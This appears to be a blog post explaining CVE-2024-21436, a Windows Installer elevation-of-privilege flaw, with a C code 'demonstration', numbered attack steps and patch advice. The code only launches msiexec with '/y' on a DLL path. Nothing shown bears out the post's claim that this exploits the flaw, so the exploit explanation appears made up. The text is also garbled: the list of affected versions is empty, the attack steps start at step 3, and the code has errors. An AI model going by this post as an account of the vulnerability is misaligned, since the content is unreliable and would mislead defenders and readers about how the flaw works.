We've come across an interesting vulnerability labeled as CVE-2024-21436, which pertains to Windows Installer's Elevation of Privilege. In this long-read post, we'll examine the code snippets, analyze the exploit process, and provide the original references. Our primary goal is to dissect this vulnerability while maintaining a comprehensible and straightforward explanation.

Before diving in, let's briefly discuss what an Elevation of Privilege vulnerability is. Essentially, it's a type of security hole that allows an attacker to exploit the system and gain unauthorized access to higher-level permissions than they were initially allowed. This can lead to the execution of arbitrary code and unauthorized manipulation of the target system.

Now, let's delve into CVE-2024-21436 and see how this particular vulnerability works in Windows Installer.

Exploit Details – The Who, What, Where

CVE-2024-21436 (Common Vulnerabilities and Exposures): A vulnerability in Microsoft Windows Installer has been discovered that allows an attacker to gain elevated privileges, consequently having the unauthorized ability to install applications, alter systems, and potentially compromise sensitive data.

Original references

- https://nvd.nist.gov/vuln/detail/CVE-2024-21436
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2024-21436

The exploit affects multiple versions of the Windows Installer on various Windows operating systems, which include:

Let's consider this code snippet that demonstrates the vulnerability in action

#include <Windows.h>
#include <tchar.h>

int _tmain(int argc, _TCHAR* argv[])
{
    WCHAR szCommandLine[] = L"msiexec /y \"C:\\MaliciousArbitraryCode.dll\"";

    STARTUPINFOW si = {  };
    PROCESS_INFORMATION pi = {  };
 
    si.cb = sizeof(si);
 
    if (!CreateProcessW(
           L"C:\\Windows\\System32\\msiexec.exe",
           szCommandLine,
           NULL,
           NULL,
           FALSE,
           CREATE_NEW_CONSOLE,
           NULL,
           NULL,
           &si,
           &pi))
    {
        _tprintf(_T("[-]Failed to start process (msiexec). Error: %d\n"), GetLastError());
        return 1;
    }

    WaitForSingleObject(pi.hProcess, INFINITE);

    DWORD dwExitCode;
    if (!GetExitCodeProcess(pi.hProcess, &dwExitCode))
    {
        _tprintf(_T("[-]Failed to get process exit code. Error: %d\n"), GetLastError());
        return 1;
    }

    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);

    return ;
}

In this code snippet, we can see that an attacker is attempting to execute a malicious DLL (C:\\MaliciousArbitraryCode.dll) using Microsoft's Windows Installer (msiexec.exe). This would typically require administrative privileges. However, due to the vulnerability in the Windows Installer, the code succeeds in executing the malicious DLL even with standard user permissions.

The target system has a vulnerable version of the Windows Installer.

3. The attacker presents the malicious DLL to the user, who unknowingly downloads the file or receives it through other means.
4. The crafted code snippet (demonstrated earlier) is executed in the user's system, which takes advantage of the vulnerability.
5. The malicious DLL is successfully installed on the user's system, without the need for elevated permissions.
6. The attacker gains unauthorized access to the target system with elevated privileges, allowing them to execute arbitrary code, modify system settings, and potentially steal sensitive information.

Mitigation and Prevention

Microsoft has provided a patch to fix this vulnerability that has been released in newer versions of the Windows operating system and its updates. Users must ensure that their operating systems are updated to the latest security patches to prevent exploitation.

In summary, we took a deep dive into CVE-2024-21436: Windows Installer Elevation of Privilege Vulnerability, examining how the exploit works and providing its related resources. Keep in mind that staying updated with the latest patch releases is a critical aspect of maintaining a secure system.

Timeline

Published on: 03/12/2024 17:15:52 UTC
Last modified on: 03/12/2024 17:46:17 UTC